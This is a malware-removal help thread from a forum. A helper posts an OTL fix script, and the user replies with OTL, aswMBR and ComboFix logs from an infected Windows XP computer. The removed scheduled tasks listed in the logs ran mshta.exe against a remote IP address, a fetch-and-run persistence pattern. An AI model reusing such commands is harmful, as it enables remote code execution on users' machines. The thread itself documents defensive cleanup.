winlogon.exe
Userinit.exe
svchost.exe
csrss.exe
PrintIsolationHost.exe
consrv.dll
/md5stop
%systemroot%\*. /mp /s
hklm\software\clients\startmenuinternet|command /rs
hklm\software\clients\startmenuinternet|command /64 /rs
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job /lockedfiles
%systemroot%\system32\drivers\*.sys /lockedfiles
CREATERESTOREPOINT

Run OTL

Paste (Ctrl + v) the copied text in the box where it says Custom Scan/Fixes

Select the All option in the Extra Registry group then Run Scan.

You should get two logs. Please copy and paste both of them.

Ron

#3
goodseed

Posted 18 January 2013 - 07:26 PM

Member

Topic Starter
Member
49 posts

========== OTL ==========
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670}\ not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\ deleted successfully.
C:\Program Files\Java\jre6\bin\ssv.dll moved successfully.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\{CCC7A320-B3CA-4199-B1A6-9F516DD69829} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}\ not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\Locked deleted successfully.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6}\ not found.
Starting removal of ActiveX control {8AD9C840-044E-11D1-B3E9-00805F499D93}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ not found.
Starting removal of ActiveX control {8FFBE65D-2C9C-4669-84BD-5829DC0B603C}
C:\WINDOWS\Downloaded Program Files\erma.inf moved successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Starting removal of ActiveX control {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ not found.
Starting removal of ActiveX control {CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ not found.
Starting removal of ActiveX control {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ not found.
Starting removal of ActiveX control {CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ not found.
Starting removal of ActiveX control {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}\ not found.
D:\AUTOEXEC.BAT moved successfully.
D:\Autorun.inf moved successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
File M:\Autorun.exe /run not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
File M:\Autorun.exe /run not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
File M:\Autorun.exe /action not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
File M:\Autorun.exe /uninstall not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D\ deleted successfully.
D:\Info.exe moved successfully.
========== FILES ==========
< at /c >
Status ID Day Time Command Line
-------------------------------------------------------------------------------
Error 1 Each M T W Th F S Su 2:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 10 Each M T W Th F S Su 9:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 11 Each M T W Th F S Su 10:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 12 Each M T W Th F S Su 10:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 13 Each M T W Th F S Su 6:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 14 Each M T W Th F S Su 2:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 15 Each M T W Th F S Su 5:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 16 Each M T W Th F S Su 11:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 17 Each M T W Th F S Su 7:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 18 Each M T W Th F S Su 11:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 19 Each M T W Th F S Su 9:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 2 Each M T W Th F S Su 1:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 20 Each M T W Th F S Su 12:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 21 Each M T W Th F S Su 8:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 22 Each M T W Th F S Su 1:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 23 Each M T W Th F S Su 4:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 24 Each M T W Th F S Su 3:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 25 Each M T W Th F S Su 12:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 26 Each M T W Th F S Su 4:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 27 Each M T W Th F S Su 2:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 28 Each M T W Th F S Su 1:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 29 Each M T W Th F S Su 3:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 3 Each M T W Th F S Su 3:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 30 Each M T W Th F S Su 5:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 31 Each M T W Th F S Su 6:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 32 Each M T W Th F S Su 7:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 33 Each M T W Th F S Su 9:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 34 Each M T W Th F S Su 10:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 35 Each M T W Th F S Su 8:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 36 Each M T W Th F S Su 1:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 37 Each M T W Th F S Su 12:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 38 Each M T W Th F S Su 11:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 39 Each M T W Th F S Su 2:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 4 Each M T W Th F S Su 4:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 40 Each M T W Th F S Su 5:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 41 Each M T W Th F S Su 3:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 42 Each M T W Th F S Su 6:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 43 Each M T W Th F S Su 10:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 44 Each M T W Th F S Su 4:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 45 Each M T W Th F S Su 11:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 46 Each M T W Th F S Su 7:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 47 Each M T W Th F S Su 8:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 48 Each M T W Th F S Su 9:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 5 Each M T W Th F S Su 5:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 6 Each M T W Th F S Su 12:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 7 Each M T W Th F S Su 6:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 8 Each M T W Th F S Su 7:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 9 Each M T W Th F S Su 8:32 AM mshta.exe http://85.234.191.60...=27576717739727
C:\Documents and Settings\Owner\Desktop\cmd.bat deleted successfully.
C:\Documents and Settings\Owner\Desktop\cmd.txt deleted successfully.
C:\WINDOWS\tasks\At1.job moved successfully.
C:\WINDOWS\tasks\At10.job moved successfully.
C:\WINDOWS\tasks\At11.job moved successfully.
C:\WINDOWS\tasks\At12.job moved successfully.
C:\WINDOWS\tasks\At13.job moved successfully.
C:\WINDOWS\tasks\At14.job moved successfully.
C:\WINDOWS\tasks\At15.job moved successfully.
C:\WINDOWS\tasks\At16.job moved successfully.
C:\WINDOWS\tasks\At17.job moved successfully.
C:\WINDOWS\tasks\At18.job moved successfully.
File move failed. C:\WINDOWS\tasks\At19.job scheduled to be moved on reboot.
C:\WINDOWS\tasks\At2.job moved successfully.
C:\WINDOWS\tasks\At20.job moved successfully.
C:\WINDOWS\tasks\At21.job moved successfully.
C:\WINDOWS\tasks\At22.job moved successfully.
C:\WINDOWS\tasks\At23.job moved successfully.
C:\WINDOWS\tasks\At24.job moved successfully.
C:\WINDOWS\tasks\At25.job moved successfully.
C:\WINDOWS\tasks\At26.job moved successfully.
C:\WINDOWS\tasks\At27.job moved successfully.
C:\WINDOWS\tasks\At28.job moved successfully.
C:\WINDOWS\tasks\At29.job moved successfully.
C:\WINDOWS\tasks\At3.job moved successfully.
C:\WINDOWS\tasks\At30.job moved successfully.
C:\WINDOWS\tasks\At31.job moved successfully.
C:\WINDOWS\tasks\At32.job moved successfully.
C:\WINDOWS\tasks\At33.job moved successfully.
C:\WINDOWS\tasks\At34.job moved successfully.
C:\WINDOWS\tasks\At35.job moved successfully.
C:\WINDOWS\tasks\At36.job moved successfully.
C:\WINDOWS\tasks\At37.job moved successfully.
C:\WINDOWS\tasks\At38.job moved successfully.
C:\WINDOWS\tasks\At39.job moved successfully.
C:\WINDOWS\tasks\At4.job moved successfully.
C:\WINDOWS\tasks\At40.job moved successfully.
C:\WINDOWS\tasks\At41.job moved successfully.
C:\WINDOWS\tasks\At42.job moved successfully.
C:\WINDOWS\tasks\At43.job moved successfully.
C:\WINDOWS\tasks\At44.job moved successfully.
C:\WINDOWS\tasks\At45.job moved successfully.
C:\WINDOWS\tasks\At46.job moved successfully.
C:\WINDOWS\tasks\At47.job moved successfully.
C:\WINDOWS\tasks\At48.job moved successfully.
C:\WINDOWS\tasks\At5.job moved successfully.
C:\WINDOWS\tasks\At6.job moved successfully.
C:\WINDOWS\tasks\At7.job moved successfully.
C:\WINDOWS\tasks\At8.job moved successfully.
C:\WINDOWS\tasks\At9.job moved successfully.
========== COMMANDS ==========

[EMPTYFLASH]

User: Administrator

User: Administrator.YOUR-46E94OWX6A
->Flash cache emptied: 0 bytes

User: All Users

User: Default User
->Flash cache emptied: 0 bytes

User: LocalService
->Flash cache emptied: 0 bytes

User: NetworkService
->Flash cache emptied: 0 bytes

User: Owner
->Flash cache emptied: 876 bytes

Total Flash Files Cleaned = 0.00 mb

[EMPTYJAVA]

User: Administrator

User: Administrator.YOUR-46E94OWX6A
->Java cache emptied: 0 bytes

User: All Users

User: Default User

User: LocalService
->Java cache emptied: 0 bytes

User: NetworkService
->Java cache emptied: 0 bytes

User: Owner
->Java cache emptied: 353632 bytes

Total Java Files Cleaned = 0.00 mb

OTL by OldTimer - Version 3.2.69.0 log created on 01182013_190910

Files\Folders moved on Reboot...
File\Folder C:\WINDOWS\tasks\At19.job not found!

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

#4
goodseed

Posted 18 January 2013 - 07:47 PM

Member

Topic Starter
Member
49 posts

aswMBR version 0.9.9.1707 Copyright© 2011 AVAST Software
Run date: 2013-01-18 19:31:00
-----------------------------
19:31:00.578 OS Version: Windows 5.1.2600 Service Pack 3
19:31:00.578 Number of processors: 2 586 0x304
19:31:00.578 ComputerName: YOUR-46E94OWX6A UserName: Owner
19:31:02.015 Initialize success
19:31:03.312 AVAST engine defs: 12121700
19:31:28.656 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP1T0L0-17
19:31:28.656 Disk 0 Vendor: MAXTOR_STM3160815AS 3.AAD Size: 152627MB BusType: 3
19:31:28.687 Disk 0 MBR read successfully
19:31:28.687 Disk 0 MBR scan
19:31:28.718 Disk 0 unknown MBR code
19:31:28.718 Disk 0 Partition 1 00 0B FAT32 RECOVERY 4975 MB offset 63
19:31:28.750 Disk 0 Partition 2 80 (A) 07 HPFS/NTFS NTFS 147641 MB offset 10190880
19:31:28.750 Disk 0 scanning sectors +312560640
19:31:28.812 Disk 0 scanning C:\WINDOWS\system32\drivers
19:31:43.359 Service scanning
19:31:57.765 Modules scanning
19:32:06.406 AVAST engine scan C:\WINDOWS
19:32:13.968 AVAST engine scan C:\WINDOWS\system32
19:34:44.890 AVAST engine scan C:\WINDOWS\system32\drivers
19:35:03.500 AVAST engine scan C:\Documents and Settings\Owner
19:39:45.218 AVAST engine scan C:\Documents and Settings\All Users
19:40:49.093 Scan finished successfully
19:46:28.109 Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Owner\Desktop\MBR.dat"
19:46:28.125 The log file has been saved successfully to "C:\Documents and Settings\Owner\Desktop\aswMBR.txt"

#5
goodseed

Posted 18 January 2013 - 08:28 PM

Member

Topic Starter
Member
49 posts

ComboFix 13-01-17.04 - Owner 01/18/2013 20:10:34.1.2 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.503.135 [GMT -6:00]
Running from: c:\documents and settings\Owner\Desktop\ComboFix.exe
AV: avast! Antivirus *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\Administrator.YOUR-46E94OWX6A\WINDOWS
c:\documents and settings\All Users\Application Data\TEMP
c:\documents and settings\All Users\Application Data\TEMP\AVG\avi7.avg
c:\documents and settings\All Users\Application Data\TEMP\AVG\crt_x64.msi
c:\documents and settings\All Users\Application Data\TEMP\AVG\files.dat
c:\documents and settings\All Users\Application Data\TEMP\AVG\incavi.avm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_cz.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_da.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_fr.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_ge.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_hu.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_id.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_in.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_it.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_jp.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_ko.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_ms.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_nl.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_pb.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_pl.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_pt.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_ru.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_sc.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_sk.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_sp.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_tr.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_us.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_zh.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_zt.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\microavi.avg
c:\documents and settings\All Users\Application Data\TEMP\AVG\miniavi.avg
c:\documents and settings\All Users\Application Data\TEMP\AVG\setup.dat
c:\documents and settings\All Users\Application Data\TEMP\AVG\setup.exe
c:\documents and settings\All Users\Application Data\TEMP\AVG\setup.ini
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupcz.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupda.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupfr.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupge.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuphu.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupid.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupin.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupit.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupjp.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupko.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupms.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupnl.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuppb.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuppl.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuppt.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupru.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupsc.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupsk.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupsp.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuptr.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupus.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupzh.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupzt.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\trialkey.dat
c:\documents and settings\All Users\Application Data\TEMP\AVG\vcredis1.cab
c:\documents and settings\All Users\Application Data\TEMP\AVG\vcredist.msi
c:\documents and settings\Default User\WINDOWS
c:\documents and settings\Owner\Application Data\Adobe\AdobeUpdate .exe
c:\documents and settings\Owner\Application Data\Adobe\plugs
c:\documents and settings\Owner\Application Data\Ciiza
c:\documents and settings\Owner\Application Data\Ciiza\qoaqy.lyi
c:\documents and settings\Owner\Application Data\Ciiza\qoaqy.tmp
c:\documents and settings\Owner\My Documents\~WRL2274.tmp
c:\documents and settings\Owner\My Documents\DPE.DUS
c:\documents and settings\Owner\WINDOWS
C:\Microsoft
c:\windows\system32\config\systemprofile\WINDOWS
c:\windows\system32\ps2.bat
c:\windows\system32\URTTemp
c:\windows\system32\URTTemp\fusion.dll
c:\windows\system32\URTTemp\mscoree.dll
c:\windows\system32\URTTemp\mscoree.dll.local
c:\windows\system32\URTTemp\mscorsn.dll
c:\windows\system32\URTTemp\mscorwks.dll
c:\windows\system32\URTTemp\msvcr71.dll
c:\windows\system32\URTTemp\regtlib.exe
c:\windows\Tasks\Ap19.job
.
.
((((((((((((((((((((((((( Files Created from 2012-12-19 to 2013-01-19 )))))))))))))))))))))))))))))))
.
.
2013-01-19 01:09 . 2013-01-19 01:09 -------- d-----w- C:\_OTL
2013-01-16 02:33 . 2013-01-16 02:40 -------- d-----w- C:\TDSSKiller_Quarantine
2013-01-15 01:26 . 2012-10-30 23:51 21256 ----a-w- c:\windows\system32\drivers\aswFsBlk.sys
2013-01-15 01:26 . 2012-10-30 23:51 361032 ----a-w- c:\windows\system32\drivers\aswSP.sys
2013-01-15 01:25 . 2012-10-30 23:51 35928 ----a-w- c:\windows\system32\drivers\aswRdr.sys
2013-01-15 01:25 . 2012-10-30 23:51 54232 ----a-w- c:\windows\system32\drivers\aswTdi.sys
2013-01-15 01:25 . 2012-10-30 23:51 738504 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2013-01-15 01:25 . 2012-10-30 23:51 97608 ----a-w- c:\windows\system32\drivers\aswmon2.sys
2013-01-15 01:25 . 2012-10-30 23:51 89752 ----a-w- c:\windows\system32\drivers\aswmon.sys
2013-01-15 01:25 . 2012-10-30 23:51 25256 ----a-w- c:\windows\system32\drivers\aavmker4.sys
2013-01-15 01:23 . 2012-10-30 23:51 41224 ----a-w- c:\windows\avastSS.scr
2013-01-15 01:23 . 2012-10-30 23:50 227648 ----a-w- c:\windows\system32\aswBoot.exe
2013-01-15 01:21 . 2013-01-15 01:21 -------- d-----w- c:\program files\AVAST Software
2013-01-15 01:21 . 2013-01-15 01:21 -------- d-----w- c:\documents and settings\All Users\Application Data\AVAST Software
2013-01-14 20:12 . 2013-01-14 20:12 -------- d-----w- c:\documents and settings\Owner\Application Data\SUPERAntiSpyware.com
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-12-16 12:23 . 2007-10-13 12:05 290560 ----a-w- c:\windows\system32\atmfd.dll
2012-12-14 22:49 . 2010-10-26 03:58 21104 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-11-13 01:25 . 2004-05-12 06:16 1866368 ----a-w- c:\windows\system32\win32k.sys
2012-11-06 02:01 . 2007-05-15 20:43 1371648 ----a-w- c:\windows\system32\msxml6.dll
2012-11-02 02:02 . 2002-12-12 14:14 375296 ----a-w- c:\windows\system32\dpnet.dll
2012-11-01 12:17 . 2007-10-13 12:07 43520 ----a-w- c:\windows\system32\licmgr10.dll
2012-11-01 12:17 . 2007-10-13 12:06 1469440 ----a-w- c:\windows\system32\inetcpl.cpl
2012-11-01 12:17 . 2004-01-22 06:16 916992 ----a-w- c:\windows\system32\wininet.dll
2012-11-01 00:35 . 2007-10-13 22:07 385024 ----a-w- c:\windows\system32\html.iec
2013-01-11 03:17 . 2013-01-11 03:14 262704 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2012-10-30 23:50 121528 ----a-w- c:\program files\AVAST Software\Avast\ashShell.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SUPERAntiSpyware"="c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe" [2012-11-01 4763008]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"hpsysdrv"="c:\windows\system\hpsysdrv.exe" [1998-05-07 52736]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 88363]
"Logitech Utility"="Logi_MwX.Exe" [2003-11-07 19968]
"KBD"="c:\hp\KBD\KBD.EXE" [2005-02-02 61440]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-09-23 35760]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2012-12-03 946352]
"QuickTime Task"="c:\program files\QuickTime\qttask.exe" [2008-11-04 413696]
"HPDJ Taskbar Utility"="c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" [2003-03-09 188416]
"Windstream_BCUC_McciTrayApp"="c:\program files\Windstream_BCUC\McciTrayApp.exe" [2010-05-01 1742336]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"avast"="c:\program files\AVAST Software\Avast\avastUI.exe" [2012-10-30 4297136]
.
